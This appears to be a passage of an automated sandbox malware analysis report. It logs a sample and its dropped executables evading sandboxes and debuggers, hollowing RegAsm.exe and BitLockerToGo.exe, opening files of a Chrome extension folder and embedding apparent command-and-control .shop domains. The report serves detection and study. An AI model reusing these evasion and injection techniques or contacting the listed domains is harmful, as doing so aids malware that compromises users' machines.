Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4180 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5100 Thread sleep time: -45000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3060 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5776 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7924 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe TID: 3668 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe TID: 4192 Thread sleep time: -1440000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1608 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7860 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 7_2_00409B30
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe Thread delayed: delay time: 60000
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: lenTsqDIajevXTuJaJ03oKGb.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: HgFsrsD7Mnq7IVYcDrZ
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2196471445.00000000012BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: OvoRF_A3QBH3keQBtcOqN7Fa.exe, 00000010.00000002.2264707504.0000000001DFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: jm8hgFsy2bHi6yaFC847
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.00000000010ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: NhwHwiZLhgFsNg0w3XQu
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2332767463.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: XLPHGFSPQHIXQJMWIYQNEBJBPSRAXIXVQJURCRMXGFAG
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000000.1922131393.0000000000282000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: vMciv4FTWk
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000000.1922131393.0000000000282000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: DEURKUJUSGIWVQOPRPWDRMHVYYEHDFBZIPNXTCMQEMUHYDLVICQWEFGRWZTLPCRMFJNFCQWPCFY
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: regmonclass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: ollydbg
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: filemonclass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: NTICE
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: SICE
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: SIWVID
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process queried: DebugPort
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process queried: DebugPort
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process queried: DebugPort
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process queried: DebugPort
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Process queried: DebugPort
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Process queried: DebugPort
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00432CB0 mov eax, dword ptr fs:[00000030h] 2_2_00432CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00432CB0 mov eax, dword ptr fs:[00000030h] 2_2_00432CB0
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 17_2_61EAF900
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 17_2_61EAF8FC
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 7wpHB_IZvVwIDf0EgO_TfPH6.exe PID: 8048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: QUh1lM2wAJwuyCkYckhrDFwz.exe PID: 8056, type: MEMORYSTR
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Code function: 11_2_022B52C1 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 11_2_022B52C1
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x14184DA5A
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x140F68E97
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x140F6956E
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtClose: Direct from: 0x140F6157B
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x14183B5C6
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x141793664
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtMapViewOfSection: Direct from: 0x1417C8CFD
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x1417BEF5F
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x1417A9B34
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtUnmapViewOfSection: Direct from: 0x14181B636
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x141817E99
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x140F5F1B5
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x141792D37
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Indirect: 0x140F2B0BD
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Memory written: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: caffegclasiqwp.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stamppreewntnq.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stagedchheiqwo.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: millyscroqwp.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: evoliutwoqm.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: condedqpwqm.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: traineiwnqo.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: locatedblsoqp.shop
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56B000
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 592000
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D8000
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BB9008
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 7C4008
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 446000
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 456000
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42F000
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 651000
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 652000
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DC2008
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A8C008
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 653008
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D3F008
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6DC008
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 440000
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe "C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe"
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8032 -ip 8032
